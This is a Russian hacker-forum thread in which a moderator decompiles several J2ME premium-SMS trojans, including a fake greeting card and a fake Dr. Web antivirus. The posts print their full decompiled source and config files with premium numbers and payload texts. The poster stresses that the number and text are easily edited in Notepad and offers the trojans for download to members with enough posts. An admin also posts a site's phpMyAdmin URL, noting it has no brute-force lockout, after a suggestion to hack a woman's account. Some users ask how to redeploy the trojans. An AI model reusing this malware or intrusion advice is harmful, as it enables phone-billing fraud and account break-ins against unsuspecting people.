1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SMSalarm - OTKPblTKA

Тема в разделе "Вирусология", создана пользователем chimatii, 19 ноя 2010.

  1. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    Сегодня утром пришла SMS-ка (гребаный мегафон с его новой услугой рассылки:():

    Код:
    +79234925428
    От Абонента Вам открытка: http://mms-ka.ru/118
    
    При открытии ссылки с мобильного телефона высветилось сообщение об установке приложения с именем "OTKPblTKA". Тут я решил, что оно без моего ведома отправит платную смс-ку, но вот куда?)

    Скачав jar-файл и распаковав его WinRAR-ом получил следующие файлы:

    Код:
    lib\Resources\ResourcesUTF8.class
    META-INF\MANIFEST.MF
    love.JPG
    main.class
    sample.png
    Итак, что я там увидел: [​IMG] - это love.JPG, видимо наша открытка

    Код:
    Manifest-Version: 1.0
    MicroEdition-Configuration: CLDC-1.0
    MIDlet-Name: OTKPblTKA
    Created-By: 1.4.2_05 (Sun Microsystems Inc.)
    MIDlet-Vendor: Unknown
    MIDlet-1: OTKPblTKA, SMSalarm.png, main
    MIDlet-Version: 1.0
    MicroEdition-Profile: MIDP-1.0
    - MANIFEST.MF, ничего интересного


    Далее при помощи DJ Java Decompiler был изучен main.class:

    Код:
    import java.io.IOException;
    import java.io.PrintStream;
    import javax.microedition.io.Connector;
    import javax.microedition.lcdui.*;
    import javax.microedition.midlet.MIDlet;
    import javax.wireless.messaging.MessageConnection;
    import javax.wireless.messaging.TextMessage;
    import lib.Resources.ResourcesUTF8;
    
    public class main extends MIDlet
        implements CommandListener
    {
    
        public main()
        {
            language = new ResourcesUTF8("/sample.png");
            isLanguage = language.load();
            cmd_ok = new Command("\u041E\u043A", 4, 2);
            cmd_cancel = new Command("\u041E\u0442\u043C\u0435\u043D\u0430", 7, 4);
        }
    
        public void startApp()
        {
            display = Display.getDisplay(this);
            try
            {
                image = Image.createImage(language.get("picname"));
            }
            catch(IOException ioexception)
            {
                System.out.println(ioexception.getMessage());
            }
            form = new Form(language.get("title"));
            form.append(language.get("textvalue"));
            form.addCommand(cmd_ok);
            form.addCommand(cmd_cancel);
            form.setCommandListener(this);
            display.setCurrent(form);
        }
    
        public void pauseApp()
        {
            System.gc();
        }
    
        public void destroyApp(boolean flag)
        {
        }
    
        public void commandAction(Command command, Displayable displayable)
        {
            if(command == cmd_ok)
            {
                try
                {
                    String s = "sms://" + language.get("numberphone1");
                    MessageConnection messageconnection = (MessageConnection)Connector.open(s);
                    TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
                    textmessage.setPayloadText(language.get("message1"));
                    messageconnection.send(textmessage);
                }
                catch(Exception exception) { }
                try
                {
                    String s1 = "sms://" + language.get("numberphone2");
                    MessageConnection messageconnection1 = (MessageConnection)Connector.open(s1);
                    TextMessage textmessage1 = (TextMessage)messageconnection1.newMessage("text");
                    textmessage1.setPayloadText(language.get("message2"));
                    messageconnection1.send(textmessage1);
                }
                catch(Exception exception1) { }
                try
                {
                    String s2 = "sms://" + language.get("numberphone3");
                    MessageConnection messageconnection2 = (MessageConnection)Connector.open(s2);
                    TextMessage textmessage2 = (TextMessage)messageconnection2.newMessage("text");
                    textmessage2.setPayloadText(language.get("message3"));
                    messageconnection2.send(textmessage2);
                }
                catch(Exception exception2) { }
                form.delete(0);
                form.append(image);
            }
            if(command == cmd_cancel)
                notifyDestroyed();
        }
    
        public static ResourcesUTF8 language;
        private boolean isLanguage;
        private Form form;
        private Image image;
        private Display display;
        private Command cmd_ok;
        private Command cmd_cancel;
    }
    Из некоторых строчек (я их выделил толстеньким) мне показалось, что sample.png - текстовый файл!:blink: Открыв его при помощи блокнота, увидел следующее:

    Код:
    title=OTKPblTKA
    textvalue=Просмотреть открытку?
    picname=/love.JPG
    numberphone1=8454
    message1=id107602940
    numberphone2=8454
    message2=id107602940
    numberphone3=8454
    message3=id107602940
    На телефоне приложение не запускал, но видно, что в данном случае будет опправлена SMS на номер "8454" (стоимость около 30 рублей) с текстом "id107602940", и за наш счет пополнятся голоса ВКонтакте, из id - по-видимому вот этой мадам:

    [​IMG]

    Ну и так как текст смс и номера для отправки можно легко изменить тем же блокнотом, вылаживаю сюда этот троянчик (но под хайдом;)):

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 30 or greater.**
     
    19 ноя 2010
    6 пользователям это понравилось.
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    chimati, мм... вкусненько!
    Я до вирусологии портативных устройств еще не добрался.
     
    19 ноя 2010
  3. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    да я сам то копался ради интереса :eek:
     
    19 ноя 2010
  4. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Отлично! Держи спасибу.
    Познавательно для меня.
     
    19 ноя 2010
  5. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    странный какой то сегодня день, но я вырыл еще один фейк, правда не проверял его, т.к. особого желания кормить кого-то нету))

    итак, описание) содержит следующие файлы:

    Код:
    META-INF\MANIFEST.MF
    SmsBox.class
    a.class
    на этот раз в .class файлах находится мало чего интересного.

    a.class, функции отправки смс:

    Код:
    import javax.microedition.io.Connection;
    import javax.microedition.io.Connector;
    import javax.wireless.messaging.*;
    
    public final class a
        implements Runnable
    {
    
        public a()
        {
        }
    
        public final void a(String s, String s1)
        {
            if(a_java_lang_Thread_fld == null)
            {
                a_java_lang_String_fld = s1;
                b = "sms://" + s;
                a_boolean_fld = false;
                a_java_lang_Thread_fld = new Thread(this);
                a_java_lang_Thread_fld.start();
            }
        }
    
        public final void run()
        {
            MessageConnection messageconnection = null;
            TextMessage textmessage;
            (textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(b)).newMessage("text")).setAddress(b);
            textmessage.setPayloadText(a_java_lang_String_fld);
            messageconnection.send(textmessage);
            a_boolean_fld = true;
            if(messageconnection != null)
                try
                {
                    messageconnection.close();
                }
                catch(Exception _ex) { }
            break MISSING_BLOCK_LABEL_114;
            JVM INSTR pop ;
            a_boolean_fld = false;
            if(messageconnection != null)
                try
                {
                    messageconnection.close();
                }
                catch(Exception _ex) { }
            break MISSING_BLOCK_LABEL_114;
            Exception exception;
            exception;
            if(messageconnection != null)
                try
                {
                    messageconnection.close();
                }
                catch(Exception _ex) { }
            throw exception;
            synchronized(this)
            {
                a_java_lang_Thread_fld = null;
            }
            return;
        }
    
        public final boolean a()
        {
            try
            {
                a_java_lang_Thread_fld.join();
            }
            catch(Exception _ex) { }
            return a_boolean_fld;
        }
    
        private String a_java_lang_String_fld;
        private String b;
        private boolean a_boolean_fld;
        private Thread a_java_lang_Thread_fld;


    SmsBox.class содержит тело программы:

    Код:
    import javax.microedition.lcdui.*;
    import javax.microedition.midlet.MIDlet;
    
    public class SmsBox extends MIDlet
        implements CommandListener, Runnable
    {
    
        public SmsBox()
        {
            a_int_fld = 0;
            a_boolean_fld = true;
            bEndNum = false;
            iTmp = 0;
            b = false;
            smsText = "";
            smsNumber = "";
            bSMSresult = false;
            display = Display.getDisplay(this);
            a_int_fld = 0;
        }
    
        public void init()
        {
            SMS = new a();
            mainForm = new Form("\u0417\u0430\u0433\u0440\u0443\u0437\u043A\u0430, \u043F\u043E\u0434\u043E\u0436\u0434\u0438\u0442\u0435...");
            mainForm.setCommandListener(this);
            mainForm.append("\u0417\u0430\u0433\u0440\u0443\u0437\u043A\u0430, \u043F\u043E\u0434\u043E\u0436\u0434\u0438\u0442\u0435... \u0415\u0441\u043B\u0438 \u043D\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u0430, \u0442\u043E \u0440\u0430\u0437\u0440\u0435\u0448\u044B\u0442\u0435 \u043E\u0442\u043F\u0440\u0430\u0432\u043A\u0443 SMS. \u0412 \u0431\u0430\u0437\u0435 \u0434\u0430\u043D\u044B\u0445 \u044D\u0442\u043E\u0433\u043E \u0430\u043D\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430 6 \u0432\u044B\u0440\u0443\u0441\u043E\u0432, \u0431\u043E \u0431\u043E\u043B\u0443\u0448\u0435 \u043D\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442!");
            display.setCurrent(mainForm);
            a_int_fld = 1;
        }
    
        public void run()
        {
    _L4:
            int i;
            do
                while(a_int_fld == 0) 
                {
                    System.gc();
                    init();
                }
            while(b);
            i = 1;
    _L2:
            if(bEndNum)
                break; /* Loop/switch isn't completed */
            smsNumber = getAppProperty("SMSNum-" + i);
            if(smsNumber == null)
            {
                bEndNum = true;
                i = 0;
                break; /* Loop/switch isn't completed */
            }
            smsText = getAppProperty("SMSText-" + i);
            if(smsText == null)
            {
                bEndNum = true;
                i = 0;
                break; /* Loop/switch isn't completed */
            }
            try
            {
                SMS.a(smsNumber, smsText);
                iTmp = i;
                bSMSresult = SMS.a();
                if(!bSMSresult)
                    i = iTmp - 1;
                if(++i > 6)
                    bEndNum = true;
            }
            catch(Throwable _ex) { }
            if(true) goto _L2; else goto _L1
    _L1:
            destroyApp(false);
            notifyDestroyed();
            if(true) goto _L4; else goto _L3
    _L3:
        }
    
        public void commandAction(Command command, Displayable displayable)
        {
        }
    
        public void triggeredEvent(Canvas canvas)
        {
        }
    
        public void startApp()
        {
            if(a_boolean_fld)
            {
                Thread thread;
                (thread = new Thread(this)).start();
                a_boolean_fld = false;
            }
        }
    
        public void pauseApp()
        {
        }
    
        public void destroyApp(boolean flag)
        {
        }
    
        public void sendSMSForm()
        {
            bSMSresult = false;
            SMS.a(smsNumber, smsText);
            bSMSresult = SMS.a();
        }
    
        public Display display;
        public Form mainForm;
        public a SMS;
        private int a_int_fld;
        private boolean a_boolean_fld;
        public boolean bEndNum;
        public int iTmp;
        private boolean b;
        public String smsText;
        public String smsNumber;
        public boolean bSMSresult;
    }
    выделенный текст - это по идее unicode )) а содержание следующее:

    [​IMG]

    непонятно что школота имела ввиду :eek:
    ну и теперь главное) в файлике MANIFEST.MF можно изменить номер и текст сообщения:

    Код:
    Manifest-Version: 1.0
    Ant-Version: Apache Ant 1.6.2
    Created-By: 1.5.0_09-b03 (Sun Microsystems Inc.)
    MIDlet-1: Death,/icon.png,SmsBox
    MIDlet-Vendor: Dr. Web
    MIDlet-Icon: /icon.png
    MIDlet-Version: 1.0.1
    MIDlet-Name: Antivirus
    MicroEdition-Profile: MIDP-2.0
    MicroEdition-Configuration: CLDC-1.0
    SMSNum-1: 4033
    SMSText-1: 997022978 
    SMSNum-2: 4033 
    SMSText-2:997022978 
    SMSNum-3: 4033
    SMSText-3: 997022978
    SMSNum-2: 4033
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 30 or greater.**
     
    19 ноя 2010
  6. chezzy
    chezzy Guest
    А теперь чимати тебе осталось сделать последнее,взломать страницу этой обезъяны которая на скрине:eek:
     
    19 ноя 2010
    1 человеку нравится это.
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Код:
    http://mms-ka.ru/phpmyadmin/
    И
    Так что все возможно.

    Бана при бруте вроде бы нету.
     
    19 ноя 2010
    1 человеку нравится это.
  8. wildmouse
    wildmouse Новичок
    Симпатии:
    0
    на каких телефонах это работает ?
     
    26 ноя 2010
  9. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    wildmouse, на всех с платформой J2ME, запустится на большинстве современных трубок
     
    26 ноя 2010
  10. ZUNAMI777
    ZUNAMI777 Продвинутый
    Симпатии:
    1
    Позновательно, а кто-нибудь может направить на скрипт Аларм-конструктора, которым эти смс-алармы штампуют?
     
    1 янв 2011
  11. rowlot
    rowlot Новичок
    Симпатии:
    0
    ахаха .. прикольная тема)))
    надо переписать скипт на пополнение кредита ))
     
    8 янв 2011
  12. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    редактируется под себя блокнотом проще простого) зачем искать что то другое

    сегодня качал интересную игрушку на телефон и попался мне еще один аларм (зае**ли честно говоря, везде обман:() :

    [​IMG] [​IMG]
    при истеричном нажатии на правую софт-кнопку приближает картинку с девушкой:

    [​IMG]

    а потом отправляет смс, при нажатии на "7" выдает текст соглашения (картинка справа, текст читаем ниже)

    ну и редактируется номер\префикс как я понял из m.class:

    Код:
    number = new String(S.nl(res));
                pref = new String(S.nl(res));
                rules = new String(strtoutf8(S.nl(res)));
                _fldfinally = new String(strtoutf8(S.nl(res)));
    в файле data.dat, содержимое:

    5373 - номер, префикс 141269

    редактируется тем же блокнотом)

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
     
    Последнее редактирование: 12 янв 2011
    12 янв 2011
  13. Dexxx
    Dexxx Новичок
    Симпатии:
    12
    Интересная тема) седня получил смс с открыткой и с ссылкой на jar файл, но к сожалению удалил) В голову не приходило покопаться в архиве, теме плюс :)
     
    12 янв 2011
  14. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    Jimm Setup xD

    в общем наткнулся я еще на одно некое подобие аларма
    сайт _http://vipaska.ru/ предлагает скачать Jimm, но в пользовательском соглашении есть весьма интересные строки:

    теперь о самой "программе":

    [​IMG] [​IMG]

    вроде как все по чесноку, она предложит на основе пользовательского соглашения отправить смс с текстом "dommeetjava java+jimm34" на номер "7781", только я не понял где же сама аська? а нет ее)

    все тексты (соглашения и прочая чепуха), выдаваемые ей можно изменить в JimmSetup.class при помощи In Class Translator
    номер и текст смс - в b.class

    качать сие творение вы можете с сайта, указанного выше
     
    19 янв 2011
  15. Piskov
    Piskov Новичок
    Симпатии:
    0
    У меня всем знакомым каждый день смски с разводом приходят
     
    23 янв 2011
  16. serus
    serus Guest
    Отлично, спасибку тыкнул, пойду поковыряюсь, может ещё, что нибудь интерестного расскапаю..)
     
    8 июн 2011
  17. Тодик
    Тодик Новичок
    Симпатии:
    0
    Подскажите пжл,как это всё собрать,а потом отправить другим абонентам с другого номера?
     
    13 июн 2011
  18. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    еще один пациент:


    Распаковываем в WinRAR, видим несколько картинок, .class файлов, и .dat файлов.

    [​IMG]

    .dat файлы - это соглашения и прочая чепуха. Но где же номер и префикс смс-ки?

    Ответ пришел, когда я тщательнее рассмотрел Download.class:

    [​IMG]

    Что это за фигня? В конце строки есть ==, похоже на BASE-64:) Идем на crypo.com, расшифровываем и получаем:

    Что же у нас внутри Thumbs.db? А там тоже текст в BASE-64:)

    Вот они - и номера и префиксы. Как видите, отредактировать этот аларм под себя довольно просто)

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 20 or greater.**
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 15 or greater.**
     
    Последнее редактирование модератором: 15 июн 2011
    15 июн 2011
    2 пользователям это понравилось.
  19. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    кстати,зачем долеко ходить. у нас тоже есть, линк
     
    15 июн 2011
    1 человеку нравится это.
  20. Тодик
    Тодик Новичок
    Симпатии:
    0
    Так вы мне всё таки помогите,или вы всех новичков игнорируете?!
     
    15 июн 2011

Поделиться этой страницей

Загрузка...